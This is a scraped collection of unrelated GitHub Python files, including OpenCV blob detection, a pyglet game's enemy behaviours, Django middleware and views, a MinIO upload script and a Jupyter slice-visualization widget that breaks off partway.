np.int0(box)\r\n rect_width = rect[1][0]\r\n rect_height = rect[1][1]\r\n rect_aspect = rect_height/rect_width\r\n if 0.25 < rect_aspect < 4:\r\n if len(contours[i]) > 5:\r\n ratio = rect_ratio(contours[i], frame_binary)\r\n if ratio > 0.35:\r\n cv2.drawContours(frame_final, [box], 0, (0, 0, 255), 2) # draw min area rect red\r\n centres.append(rect[0])\r\n\r\n return centres, frame_final\r\n\r\n\r\n\r\n","repo_name":"hdthumb/lake_analysis","sub_path":"find_bubbles_lk.py","file_name":"find_bubbles_lk.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8395916172","text":"import time\r\n#defining a decorator\r\ndef calltime(func):\r\n def inner(*args):\r\n st=time.time()\r\n print(\"the start time is\",st)\r\n func(*args)\r\n et=time.time()\r\n print(\"The end time is\",et)\r\n d=et - st\r\n print(\"The time taken is\",d)\r\n minutes,sec=divmod(d,60)\r\n print(\"Minutes : \",minutes,\"\\nSeconds : \",sec)\r\n return inner\r\n#defining a generator\r\ndef Fibs():\r\n a,b=0,1\r\n while(True):\r\n yield a\r\n c=a+b\r\n a=b\r\n b=c\r\n #a,b=b,a+b\r\nn=int(input(\"Enter the value of n: \"))\r\n\r\n\r\n@calltime\r\ndef my(n):\r\n fibs=Fibs()\r\n for f in range(n):\r\n print(next(fibs))\r\n\r\n#calling my function\r\nmy(n)","repo_name":"Ashish-Garg524/oops_practical","sub_path":"program10.py","file_name":"program10.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8818512486","text":"from random import randint\nimport random\nimport math\nimport utils\nimport pyglet\nimport resources as res\nimport constants as CONSTS\n\n\ndef enter(self):\n while(True):\n if self.x < self.min_x:\n self.x += 5\n elif self.x >= self.max_x:\n self.x -= 5\n if self.y < self.min_y:\n self.y += 5\n elif self.y > self.max_y:\n self.y -= 5\n\n if not self.is_outside:\n self.nonactive = False\n self.show_on_radar = True\n yield True\n else:\n yield False\n\n\ndef dying(self):\n self.scale = 1\n while(True):\n # if positional death (because of bullets, fade)\n if self._death_vx:\n self.x += self._death_vx\n self.y += self._death_vy\n self.scale *= 0.999\n if self.scale <= 0.3:\n self.remove = True\n # else if non-positional death (i.e., line enemy, out of bounds),\n # just remove\n else:\n self.remove = True\n yield 0\n\n\ndef exits(self):\n self._exits = True\n while(True):\n yield 0\n\n\ndef repulse(self, repulse_pos):\n x, y = repulse_pos\n repulse_theta = math.atan2(\n self.y - y, self.x - x)\n for i in xrange(5):\n self.vel_x = math.cos(repulse_theta) * 500\n self.vel_y = math.sin(repulse_theta) * 500\n yield 0\n while(True):\n\n yield 0\n\n\ndef pulse(self):\n while(True):\n self.scale = 0.95 + randint(0, 40) / 100.0\n yield 0\n\n\ndef delay(self, delay_time=0, alpha_time=50):\n \"\"\"\n Function that delays 'Enemy Spawn'\n Useful for delayed spawning ofc :P\n\n Keyword arguments:\n delay_time -- time when enemy should be active\n alpha_time -- time when enemy should appear\n\n An enemy can appear but still be inactive (alpha_time)\n \"\"\"\n\n first_x, first_y = self.x, self.y\n\n delay_time = int(delay_time)\n alpha_time = float(alpha_time)\n\n max_scale = 5\n\n self.opacity = 0\n self.scale = max_scale\n self.show_on_radar = False\n\n for i in xrange(delay_time):\n self._des_vy = 0\n self._des_vx = 0\n self.vel_x = 0\n self.vel_y = 0\n self.collidable = False\n yield 0\n\n i = 1\n d_i = 0\n d_i_interval = 1 / alpha_time\n\n music = res.spawn\n music.play()\n\n while(True):\n last_scale = self.scale\n if i <= alpha_time:\n self.show_on_radar = True\n self._des_vy = 0\n self._des_vx = 0\n self.vel_x = 0\n self.vel_y = 0\n self.collidable = False\n self.scale = max(1, max_scale - (i / alpha_time) * (max_scale - 1))\n self.opacity = min(255, (i / alpha_time) * 255)\n else:\n self.collidable = True\n i += 1\n yield 0\n\n\ndef rotate(self, angle=90):\n while(True):\n self.rotation = angle\n yield 0\n\n\ndef attract(self):\n self.attract = True\n while(True):\n yield 0\n\n\ndef black_hole(self):\n self.trackable = False\n self._blackhole_sep_v = 100.0\n self._black_hole = pyglet.sprite.Sprite(\n img=res.black_field, x=self.x, y=self.y, batch=self.batch)\n\n while(True):\n self._black_hole.x = self.x\n self._black_hole.y = self.y\n yield 0\n\n\ndef black_hole_cb(self):\n self._black_hole.delete()\n\n\ndef spin(self, speed=0.1):\n while(True):\n self.rotation += speed\n yield 0\n\n\ndef bounce(self, speed=3):\n r = -randint(0, 360) * math.pi / 180\n self.dir_x = math.cos(r)\n self.dir_y = math.sin(r)\n while(True):\n if self.y <= self.min_y or self.y >= self.max_y:\n self.dir_y = -self.dir_y\n elif self.x <= self.min_x or self.x >= self.max_x:\n self.dir_x = -self.dir_x\n\n self.vel_x = self.dir_x * speed\n self.vel_y = self.dir_y * speed\n yield 0\n\n\ndef move_square(self):\n f = 30\n speed = 1\n while(True):\n for i in xrange(f):\n self.vel_x += speed\n yield 0\n for i in xrange(f):\n self.vel_y -= speed\n yield 0\n for i in xrange(f):\n self.vel_x -= speed\n yield 0\n for i in xrange(f):\n self.vel_y += speed\n yield 0\n\n\ndef follow_player(self, speed=3):\n speed = speed\n while(True):\n if not self.track.dead:\n vx, vy = utils.normalize(\n self.track.x - self.x, self.track.y - self.y)\n vx *= speed\n vy *= speed\n self._des_vx = vx\n self._des_vy = vy\n yield 0\n\n\ndef rotate_to_player(self):\n i = 0\n amplitude = 5\n speed = 2\n while(True):\n i += amplitude\n vx, vy = utils.normalize(self.track.x - self.x, self.track.y - self.y)\n self._des_vy = amplitude * math.cos(i * math.pi / 180) + vy * speed\n self._des_vx = amplitude * math.sin(i * math.pi / 180) + vx * speed\n yield 0\n\n\ndef flank(self, horizontal=True, speed=5):\n self.separate = False\n if horizontal:\n while(True):\n mod = self.image.width / 2\n self.vel_x += speed\n if self.x >= CONSTS.game_width:\n self.x = CONSTS.game_width - mod - 5\n speed *= -1\n elif self.x <= 0:\n self.x = mod\n speed *= -1\n yield 0\n else:\n while(True):\n mod = self.image.height / 2\n self.vel_y += speed\n if self.y >= CONSTS.game_height:\n self.y = CONSTS.game_height - mod - 5\n speed *= -1\n elif self.y <= 0:\n self.y = mod\n speed *= -1\n yield 0\n\n\ndef zip(self, speed=20):\n x_active = False\n\n friction = 0.98\n iter_i = 0\n\n direction = pyglet.sprite.Sprite(\n x=self.x, y=self.y, img=res.squeezer_arrow, batch=self.layer)\n while(True):\n if direction:\n if self.dead:\n direction.delete()\n direction = False\n else:\n iter_i -= 1\n\n if not x_active:\n direction.rotation = 0 if self.track.x > self.x else 180\n else:\n direction.rotation = 270 if self.track.y > self.y else 90\n\n direction.x = self.x\n direction.y = self.y\n if iter_i <= 60:\n direction.opacity -= 10\n\n if iter_i <= 0:\n direction.opacity = 0\n iter_i = 240\n x_active = not x_active\n self.vel_x = self.vel_y = self._des_vx = self._des_vy = 0\n vx = speed if self.track.x > self.x else -speed\n vy = speed if self.track.y > self.y else -speed\n\n if x_active:\n vx *= friction\n self._des_vx = vx\n else:\n vy *= friction\n self._des_vy = vy\n yield 0\n\n\ndef evade(self):\n speed = 50\n while(True):\n aneighbors = 0\n vx = vy = 0\n for other in self.evade_list:\n aneighbors += 1\n\n vx += (other.x) - self.x\n vy += (other.y) - self.y\n\n vx *= speed\n vy *= speed\n\n vx /= self._aneighbors\n vy /= self._aneighbors\n vx, vy = utils.normalize(vx, vy)\n vx *= -5\n vy *= -5\n\n self.vel_x += vx\n self.vel_y += vy\n yield 0\n\n\ndef flee(self):\n speed = 0.5\n while(True):\n vx, vy = utils.normalize(self.x - self.track.x, self.y - self.track.y)\n vx *= speed\n vy *= speed\n self._des_vx += vx\n self._des_vy += vy\n yield 0\n\n\ndef link_sensor(self, x, y,):\n \"\"\"\n Callback when link sensor is collided to\n \"\"\"\n self.link_enemy.link_collide(x, y)\n\n\ndef split(self):\n while(True):\n self.split = True\n yield 0\n\n\ndef link(self, pair=None, sensors=None):\n\n self.trackable = False\n\n if not pair == None:\n self.pair = pair\n init_dists = []\n # Get the initial distances for the sensors (radial movement)\n for sensor in sensors:\n init_dists.append(sensor.x - pair.x)\n sensor.link_enemy = self\n init_dist = self.x - pair.x\n\n \"\"\"\n Kill the whole Line when collided with sensor\n \"\"\"\n def link_collide(x, y):\n if self.dead == False:\n self.dead = True\n pair.dead = True\n self.shot(x, y)\n pair.shot(x, y)\n for sensor in sensors:\n sensor.dead = True\n\n self.link_collide = link_collide\n while(True):\n if pair == None:\n self.rotation -= 1\n else:\n self.y = pair.y + init_dist * \\\n math.sin(-pair.rotation * math.pi / 180)\n self.x = pair.x + init_dist * \\\n math.cos(-pair.rotation * math.pi / 180)\n\n for i in xrange(len(sensors)):\n if not sensors[i].dead:\n sensors[i].y = pair.y + init_dists[i] * \\\n math.sin(-pair.rotation * math.pi / 180)\n sensors[i].x = pair.x + init_dists[i] * \\\n math.cos(-pair.rotation * math.pi / 180)\n\n self.rotation = pair.rotation - 180\n self.debug_vertex_list.append(self.layer.add(2, pyglet.gl.GL_LINES,\n None,\n ('v2f', (\n self.x, self.y, pair.x, pair.y)),\n ('c4B', (255,\n 0, 0, 255) * 2)\n ))\n yield 0\n\n\ndef shoot_circle(self, timer=60):\n from game.objects import Bullet\n timer_i = 10\n while(True):\n timer_i -= 1\n if timer_i <= 0:\n timer_i = timer\n for i in range(0, 360, 15):\n bullet = Bullet(behaviours=[[by_angle, i]], x=self.x, y=self.y, speed=2,\n img=res.fire_particle, batch=self.batch, on_bounds_kill=True)\n self.bullets.append(bullet)\n yield 0\n\n\ndef shoot_fire(self, angle=90, mod_dist=5, timer=40):\n from game.objects import Bullet\n\n timer_i = timer\n mod_dist = mod_dist\n a_i = angle\n mod = True\n\n while(True):\n timer_i -= 1\n if timer_i <= 0:\n timer_i = timer\n\n a_i += mod_dist\n\n bullet = Bullet(behaviours=[[by_angle, a_i]], x=self.x, y=self.y, speed=2,\n img=res.fire_particle, batch=self.batch, on_bounds_kill=True)\n self.bullets.append(bullet)\n\n yield 0\n\n\ndef circle_detect(self):\n\n background = pyglet.graphics.OrderedGroup(0)\n foreground = pyglet.graphics.OrderedGroup(1)\n detect = pyglet.sprite.Sprite(\n x=0, y=0, img=res.circle_detect, batch=self.layer, group=background)\n detect_text = pyglet.sprite.Sprite(\n x=0, y=0, img=res.circle_detect_text, batch=self.layer, group=foreground)\n while(True):\n if self.dead:\n detect.opacity = 0\n detect.delete()\n detect_text.delete()\n else:\n detect.x = self.x\n detect.y = self.y\n detect.rotation += 5\n detect_text.x = self.x\n detect_text.y = self.y\n yield 0\n\n\"\"\"\nBullet Behaviours\n\"\"\"\n\n\ndef spiral(self, i):\n wait = 60\n while(True):\n wait -= 1\n if wait < 0:\n i += 0.4\n r = i * -math.pi / 180\n self.vel_x = math.cos(r) * self.speed\n self.vel_y = -2 # math.sin(r) * self.speed\n\n yield 0\n\n\ndef by_angle(self, r, speed=5):\n self.rotation = r\n r *= -math.pi / 180\n dir_x = math.cos(r) * speed\n dir_y = math.sin(r) * speed\n self.vel_x = dir_x\n self.vel_y = dir_y\n while(True):\n yield 0\n\n\ndef by_sin(self, r):\n speed = 2\n amp = randint(20, 50)\n\n a = 0\n ar = r * -math.pi / 180\n dir_x, dir_y = math.cos(ar) * speed, math.sin(ar) * speed\n start_x, start_y = self.x, self.y\n\n while(True):\n if r == 0 or r == 180:\n self._des_vx += dir_x / 3.0\n self._des_vy = (math.sin(a) * amp + start_y) - self.y\n else:\n self._des_vx = (math.sin(a) * amp + start_x) - self.x\n self._des_vy += dir_y / 3.0\n a += 5 * math.pi / 180\n yield 0\n\n\ndef chase(self):\n speed = 5\n while(True):\n if not self.track.dead:\n vx, vy = utils.normalize(\n self.track.x - self.x, self.track.y - self.y)\n theta = math.atan2(\n self.track.y - self.y, self.track.x - self.x) * 180 / math.pi\n vx = 5 * (90 - abs(theta)) / 90\n if theta < 0:\n vy = -speed + abs(vx)\n else:\n vy = speed - abs(vx)\n self.x += vx\n self.y += vy\n\n self.vel_x = utils.trunc(self.vel_x + vx * speed, 8)\n self.vel_y = utils.trunc(self.vel_y + vy * speed, 8)\n yield 0\n\n\ndef penrose(self):\n r = 0\n while(True):\n r += 5\n r_pi = r * -math.pi / 180\n k = 6 / float(5)\n self.x = math.cos(k * r_pi) * math.sin(r_pi) * 100 + self.first_x\n self.y = math.sin(k * r_pi) * math.sin(r_pi) * 100 + self.first_y\n yield 0\n","repo_name":"Secretmapper/Merc-01","sub_path":"game/behaviours.py","file_name":"behaviours.py","file_ext":"py","file_size_in_byte":13545,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"43010731262","text":"from __future__ import print_function\n\nimport logging\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\n\nfrom companies.models import Company, CompanyUser, NoLivePlanException\nfrom revenues.models import RevenuePlan\n\nlogger = logging.getLogger('icmo.%s' % __name__)\n\n\nclass AddCompanyPlanMiddleware(object):\n \"\"\"\n Add the company and plan to the request if they are in the\n view kwargs. Works with both the web and rest interfaces.\n \"\"\"\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n if not request.user.is_authenticated():\n return None\n request.selected_company = None\n request.selected_plan = None\n company_slug = None\n plan_slug = None\n for key, val in view_kwargs.items():\n if key == 'company_slug' or key.endswith('company__slug'):\n company_slug = val\n elif key == 'plan_slug' or key.endswith('revenue_plan__slug'):\n plan_slug = val\n\n if company_slug:\n try:\n request.selected_company = Company.objects.get(slug=company_slug)\n except Company.DoesNotExist:\n return HttpResponseRedirect(reverse('companies'))\n\n if plan_slug:\n try:\n request.selected_plan = RevenuePlan.objects.get(\n company=request.selected_company, slug=plan_slug)\n except RevenuePlan.DoesNotExist:\n return HttpResponseRedirect(reverse('revenue_plans', kwargs=dict(\n company_slug=request.selected_company.slug)))\n # Save the selected company to the user\n if request.selected_plan.pk != request.user.last_revenue_plan_id:\n request.user.last_revenue_plan_id = request.selected_plan.id\n request.user.save()\n elif request.user.is_authenticated() and request.user.owned_companies.count() == 1:\n request.selected_company = request.user.owned_companies.first()\n return None\n\n\nclass AddCompanyUserMiddleware(object):\n \"\"\"\n Add the company_user to the request and bounce if the user does\n not have access to this company. Between this and the BouncerMiddleware\n below all company, revenue_plan, and segment access restriction is\n implemented for both the web and rest interfaces.\n\n Note: Must come after AddCompanyPlanMiddleware\n \"\"\"\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n request.company_user = None\n if request.user.is_authenticated() and request.selected_company:\n try:\n request.company_user = CompanyUser.objects.select_related().get(\n company=request.selected_company,\n user=request.user)\n except ObjectDoesNotExist:\n logger.debug(\n 'User %s was blocked because no CompanyUser could be found for '\n 'company `%s`' % (request.user, request.selected_company.slug))\n return HttpResponseRedirect(reverse('permission_denied'))\n return None\n\n\nclass PlanBouncerMiddleware(object):\n \"\"\"\n Check the selected_plan and any segment_slug for access\n\n Note: Must come after AddCompanyPlanMiddleware\n \"\"\"\n\n def process_view(self, request, view_func, view_args, view_kwargs):\n if request.company_user:\n if request.selected_plan:\n try:\n if request.selected_plan.slug not in \\\n request.company_user.permitted_revenue_plans_slugs:\n logger.debug(\n 'User %s was blocked from accessing a plan other than the live plan'\n % request.user)\n return HttpResponseRedirect(reverse('permission_denied'))\n except NoLivePlanException:\n logger.debug(\n 'User %s was blocked because there is no active plan `%s`' % request.user)\n return HttpResponseRedirect(reverse('no_published_plan'))\n","repo_name":"hasanulhaquebanna/testing-gregg","sub_path":"icmo/apps/core/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39155974713","text":"import urllib.parse\nfrom io import BytesIO\n\nimport PIL\nimport requests\nfrom django.conf import settings\nfrom rest_framework import permissions, status\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n\nclass MatchColour(APIView):\n permission_classes = [permissions.IsAuthenticated]\n\n def get(self, request: Request) -> Response:\n errors = []\n\n url = request.query_params.get(\"url\", None)\n if url is not None:\n parsed_url = urllib.parse.urlparse(url)\n if parsed_url.scheme.lower() not in (\"http\", \"https\"):\n # prevent file:// attacks etc\n errors.append(\"Only http or https URLs are allowed\")\n else:\n url = \"\" # for \"might be referenced before assignment\"\n errors.append(\"Please specify a 'url' query parameter\")\n\n space = request.query_params.get(\"colour_space\", settings.DEFAULT_COLOUR_SPACE).lower()\n if space not in settings.COLOUR_MATCHERS or space not in settings.DEFAULT_MAX_DISTANCES:\n errors.append(\"Invalid colour space\")\n else:\n max_distance_str = request.query_params.get(\"max_distance\", None)\n if max_distance_str is None:\n max_distance = settings.DEFAULT_MAX_DISTANCES[space]\n else:\n try:\n max_distance = float(max_distance_str)\n except ValueError:\n max_distance = -1.0 # for \"might be referenced before assignment\"\n errors.append(\"Invalid max distance\")\n\n summariser = request.query_params.get(\"summariser\", settings.DEFAULT_IMAGE_SUMMARISER).lower()\n if summariser not in settings.IMAGE_SUMMARISERS:\n errors.append(\"Invalid image summariser\")\n\n if errors != []:\n return Response({\"errors\": errors}, status=status.HTTP_400_BAD_REQUEST)\n\n # This is potentially a big security hole, at the very least for reflected DDOSes.\n # Make sure this view's permissions are set to at least IsAuthenticated.\n try:\n r = requests.get(url)\n except requests.RequestException:\n return Response(\n {\"errors\": [\"Could not fetch the URL given, could not connect\"]},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n if not r.ok:\n return Response(\n {\"errors\": [f\"Could not fetch the URL given, status code was {r.status_code}\"]},\n status=status.HTTP_400_BAD_REQUEST,\n )\n image_file = BytesIO(r.content)\n\n try:\n image_colour = settings.IMAGE_SUMMARISERS[summariser].summarise(image_file)\n except PIL.UnidentifiedImageError:\n return Response({\"errors\": [\"Could not parse image\"]}, status=status.HTTP_400_BAD_REQUEST)\n\n nearest_colour, distance = settings.COLOUR_MATCHERS[space].nearest(image_colour)\n\n if distance > max_distance:\n return Response(\n {\"errors\": [f\"No colour found within {max_distance} units\"]}, status=status.HTTP_404_NOT_FOUND\n )\n\n return Response({\"colour\": nearest_colour, \"distance\": distance})\n","repo_name":"ojno/closest_colour","sub_path":"closest_colour/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70009261583","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom django.views.generic.base import TemplateView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('users/', include('users.urls')),\n path('project/', include('Project.urls')),\n path('seminar/', include('seminar.urls')),\n path('lab/', include('lab.urls')),\n path('search/', include('search.urls')),\n path('', TemplateView.as_view(template_name='home.html'), name='home'),\n]","repo_name":"Acciente717/AcademicDealerBackend","sub_path":"AcademicDealerBackend/AcademicDealerBackend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"35154072404","text":"from sys import stdin\nfrom collections import defaultdict\nfrom collections import Counter\nimport re\n\ninp = [i.strip() for i in stdin.readlines()]\ninp.sort()\nguards = defaultdict(list)\ni = 0\nwhile(i < len(inp)):\n if re.search('#(\\d+)', inp[i]):\n num = int(re.search('#(\\d+)', inp[i]).group()[1:])\n i += 1\n while(i < len(inp) and not re.search('#(\\d+)', inp[i])):\n guards[num] += list(range(int(inp[i].split(':')[1][:2]), int(inp[i+1].split(':')[1][:2])))\n i += 2\nmax = 0\noccurances = dict()\nfor i in guards.keys():\n counter = Counter(guards[i])\n occurances[i] = counter.most_common(1)[0]\n if occurances[i][1] > max:\n maxId, minute, max = i, occurances[i][0], occurances[i][1]\nprint(maxId*minute)","repo_name":"tterb/advent-of-code","sub_path":"2018/day4p2.py","file_name":"day4p2.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"70906556303","text":"#!/usr/bin/env/python\nimport os\nimport zipfile\nimport boto3\nfrom botocore.client import Config\n\n\n\n\nENDPOINT=os.environ.get(\"ENDPOINT\")\nMINIO_ACCESS_KEY=os.environ.get(\"MINIO_ACCESS_KEY\")\nMINIO_SECRET_KEY=os.environ.get(\"MINIO_SECRET_KEY\")\nBUCKET=os.environ.get(\"BUCKET\")\nFILEPATH=os.environ.get(\"FILEPATH\")\nFILENAME=os.environ.get(\"FILENAME\")\nID_TRAINING=os.environ.get(\"ID_TRAINING\")\n\n\ns3 = boto3.resource('s3',\n endpoint_url=ENDPOINT,\n aws_access_key_id=MINIO_ACCESS_KEY,\n\t\t aws_secret_access_key=MINIO_SECRET_KEY,\n config=Config(signature_version='s3v4'),\n region_name='us-east-1')\n\n\ns3.Bucket(BUCKET).download_file(FILENAME, FILENAME)\n\npath, ext = os.path.splitext(FILENAME)\n\nif (ext==\".zip\"):\n\tarchivio = zipfile.ZipFile(FILENAME) \n\n\n\t# estrazione di tutti i file\n\tarchivio.extractall() \n\n\t#chiusura\n\tarchivio.close()\n\n\tfor file in os.listdir(path):\n\t\t\n\t\ts3.Bucket(BUCKET).upload_file(path+\"/\"+file, ID_TRAINING+\"-\"+file )\nelse:\n\n\ts3.Bucket(BUCKET).upload_file(FILENAME, ID_TRAINING+\"-\"+FILENAME)\n\nprint (\"Scaricato file e ricaricato con id-training nel nome\")\n\n","repo_name":"FedericoGiuliana/Mimir-Engine","sub_path":"Dummy/estrazione.py","file_name":"estrazione.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38219101595","text":"from Filter_Frame import *\nimport cv2\nimport numpy as np\n\n# Setup SimpleBlobDetector parameters. More details in https://www.learnopencv.com/blob-detection-using-opencv-python-c/\nparams = cv2.SimpleBlobDetector_Params()\ncap = cv2.VideoCapture('/home/dilan/Desktop/Final Year Project/Programming Testing/Filter Test/Videos/video1.mp4')\n\n# Change thresholds for intensity. hence the blobs are dark thresholds should be low\nparams.minThreshold = 0\nparams.maxThreshold = 125\n\n# Filter by Area. Need to find a better threshold calculating mechanism\nparams.filterByArea = True\nparams.minArea = 100 #Should be set according to a\n # ratio between considering area and actual expecting object size\nparams.maxArea = np.pi*12*12\n\n\n# Filter by Circularity\nparams.filterByCircularity = True\nparams.minCircularity = 0.1\nparams.maxCircularity = 0.9\n\n# Filter by Convexity\nparams.filterByConvexity = True\nparams.minConvexity = 0.5\nparams.maxConvexity = 0.9\n\n# Filter by Inertia // lower values are better because when moving Inertia tends to become 0\nparams.filterByInertia = True\nparams.minInertiaRatio = 0.1\nparams.maxInertiaRatio = 0.9\n\n\n# Set up the detector with default parameters.\ndetector = cv2.SimpleBlobDetector_create(params)\n\nwhile cap.isOpened():\n ret, frame = cap.read()\n if frame is None:\n break\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n frame = filterFrame(frame)\n\n # frame = cv2.equalizeHist(frame)\n\n keypoints = detector.detect(frame)\n\n\n\n im_with_keypoints = cv2.drawKeypoints(frame, keypoints, np.array([]), (0, 0, 255),\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n\n for i in keypoints:\n print(i.response)\n\n cv2.imshow('frame', im_with_keypoints)\n\n if cv2.waitKey(0) & 0xFF == ord('q'):\n continue\n\nelse:\n cap.release()\n cv2.destroyAllWindows()\n\ncap.release()\ncv2.destroyAllWindows()\nprint(\"Successfully Completed!\")","repo_name":"DinushkaDDS/Change-Detection-In-SAR-Videos","sub_path":"Filter Test/Final System Files/Test_Blob.py","file_name":"Test_Blob.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"22363536814","text":"import matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom ipywidgets import widgets\nimport numpy as np\nfrom slicevis.image import Image\nfrom slicevis.load import load_image\n\nis_debug = False # global debug flag\n\n\nclass SliceWidget:\n \"\"\"Class for widgets that offers interactive visualization of slices in 3D dataset\"\"\"\n\n def __init__(self, image3D, debug=False):\n \"\"\"Constructor for SliceWidget. Configures GUI layout and connects callbacks.\n\n Args:\n image3D (_type_): the 3D dataset\n debug (bool, optional): enable Debug output mode. Defaults to False.\n\n Raises:\n ValueError: if image3D has the wrong dimensions\n \"\"\"\n if image3D.ndim != 3:\n raise ValueError(\"input image must be 3D\")\n\n self.image3D = image3D # input image\n\n # initializing segmentations and classes\n self.seg3D = None\n self.seg2D = None\n self.seg3D_validation = None\n self.seg2D_validation = None\n self.class_names = {}\n self.class_names_validation = {}\n self.class_colors = {}\n\n # default slice\n self.curr_axis = 2 # z = const plane\n default_slice = int(image3D.shape[self.curr_axis] / 2) # axial slice\n self.image2D = image3D[:, :, default_slice] # current slice\n\n # slice buttons in horizontal layout\n self.b_axial = widgets.Button(description=\"Show axial\")\n self.b_coronal = widgets.Button(description=\"Show coronal\")\n self.b_sagittal = widgets.Button(description=\"Show sagittal\")\n self.b_layout = widgets.HBox(\n [self.b_axial, self.b_coronal, self.b_sagittal],\n )\n\n # rotation buttons in second row\n self.b_rot = widgets.Button(description=\"Rotate 90°\")\n self.b_flip_ud = widgets.Button(description=\"Flip upside down\")\n self.b_flip_lr = widgets.Button(description=\"Flip left to right\")\n self.util_layout = widgets.HBox([self.b_rot, self.b_flip_ud, self.b_flip_lr])\n\n # stack buttons\n self.b_layout_vertical = widgets.VBox(\n [self.b_layout, self.util_layout],\n layout=widgets.Layout(width=\"80%\", align_items=\"center\"),\n )\n\n # vertical slider (+ buttons and labels)\n max = self.image3D.shape[self.curr_axis] - 1\n self.slider = widgets.IntSlider(\n description=\"Z\",\n value=default_slice,\n min=0,\n max=max,\n step=1,\n orientation=\"vertical\",\n )\n self.b_up = widgets.Button(\n description=\"↑\", layout=widgets.Layout(width=\"50px\", font_weight=\"bold\")\n )\n self.b_down = widgets.Button(\n description=\"↓\", layout=widgets.Layout(width=\"50px\", font_weight=\"bold\")\n )\n self.min_label = widgets.Label(value=\"Min = 0\")\n self.max_label = widgets.Label(value=\"Max = \" + str(max))\n self.slider_layout = widgets.VBox(\n [self.max_label, self.b_up, self.slider, self.b_down, self.min_label],\n layout=widgets.Layout(align_items=\"center\"),\n )\n\n # figure setup\n self.color = \"gray\"\n xlabel = \"Y\"\n ylabel = \"X\"\n\n # using plotly express imshow for interactive display\n self.fig = px.imshow(\n self.image2D,\n color_continuous_scale=self.color,\n labels={\"x\": xlabel, \"y\": ylabel, \"color\": \"Value\"},\n width=800,\n height=600,\n )\n self.widget = go.FigureWidget(data=self.fig) # dynamic figure widget\n self.widget_box = widgets.Box([self.widget])\n\n # load buttons\n self.b_load_seg = widgets.Button(description=\"Load\")\n self.b_clear_seg = widgets.Button(description=\"Clear\")\n self.segmentation_path = widgets.Text(\n placeholder=\"Segmentation file\",\n layout=widgets.Layout(width=\"90%\"),\n )\n self.load_seg_box = widgets.VBox(\n [\n self.segmentation_path,\n widgets.HBox(\n [self.b_load_seg, self.b_clear_seg],\n layout=widgets.Layout(width=\"95%\"),\n ),\n ],\n layout=widgets.Layout(width=\"20%\", align_items=\"center\"),\n )\n\n # load validation segmentation\n self.b_load_valid = widgets.Button(description=\"Load\")\n self.b_clear_valid = widgets.Button(description=\"Clear\")\n self.validation_path = widgets.Text(\n placeholder=\"Validation file\",\n layout=widgets.Layout(width=\"90%\"),\n )\n self.load_valid_box = widgets.VBox(\n [\n self.validation_path,\n widgets.HBox(\n [self.b_load_valid, self.b_clear_valid],\n layout=widgets.Layout(width=\"95%\"),\n ),\n ],\n layout=widgets.Layout(width=\"20%\", align_items=\"center\"),\n )\n\n self.b_layout_horizontal = widgets.HBox(\n [\n self.load_seg_box,\n self.load_valid_box,\n self.b_layout_vertical,\n ],\n layout=widgets.Layout(\n justify_content=\"space-around\", align_items=\"center\", width=\"85%\"\n ),\n )\n\n # optional debug output\n self.out = widgets.Output()\n self.b_clear = widgets.Button(description=\"Clear\")\n\n # app layout\n self.slice_layout = widgets.HBox(\n [self.slider_layout, self.widget_box],\n layout=widgets.Layout(align_items=\"center\"),\n )\n\n global is_debug\n is_debug = debug\n if is_debug:\n self.app = widgets.VBox(\n [\n self.b_layout_horizontal,\n self.slice_layout,\n widgets.VBox([self.b_clear, self.out]),\n ]\n )\n else:\n self.app = widgets.VBox([self.b_layout_horizontal, self.slice_layout])\n self.app.layout.justify_content = (\n \"flex-start\" # main axis = vertical (no effect)\n )\n self.app.layout.align_items = \"center\" # cross axis = horizontal\n self.app.layout.border = \"2px solid gray\"\n\n # connect buttons to callbacks\n self.b_axial.on_click(self._show_axial)\n self.b_axial.on_click(self._axis_changed)\n self.b_coronal.on_click(self._show_coronal)\n self.b_coronal.on_click(self._axis_changed)\n self.b_sagittal.on_click(self._show_sagittal)\n self.b_sagittal.on_click(self._axis_changed)\n self.b_rot.on_click(self._rotate_view)\n self.b_flip_ud.on_click(self._flip_up)\n self.b_flip_lr.on_click(self._flip_lr)\n\n self.b_load_seg.on_click(self._load_segmentation)\n self.b_clear_seg.on_click(self._clear_segmentation)\n self.b_load_valid.on_click(self._load_validation_segmentation)\n self.b_clear_valid.on_click(self._clear_validation)\n\n self.slider.observe(self._slice_changed, names=\"value\")\n self.b_up.on_click(self._up_pressed)\n self.b_down.on_click(self._down_pressed)\n\n # show layout borders in debug mode\n if 